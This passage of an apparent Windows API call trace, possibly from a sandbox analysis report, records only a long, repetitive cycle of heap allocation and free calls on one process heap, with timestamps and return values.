0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.496] GetProcessHeap () returned 0xe30000 [0059.496] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.496] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.497] GetProcessHeap () returned 0xe30000 [0059.497] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0059.498] GetProcessHeap () returned 0xe30000 [0059.498] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.499] GetProcessHeap () returned 0xe30000 [0059.499] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0059.500] GetProcessHeap () returned 0xe30000 [0059.500] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0059.500] GetProcessHeap () returned 0xe30000 [0059.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.501] GetProcessHeap () returned 0xe30000 [0059.501] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0059.501] GetProcessHeap () returned 0xe30000 [0059.502] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.502] GetProcessHeap () returned 0xe30000 [0059.502] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.502] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.503] GetProcessHeap () returned 0xe30000 [0059.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0059.504] GetProcessHeap () returned 0xe30000 [0059.504] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.504] GetProcessHeap () returned 0xe30000 [0059.505] 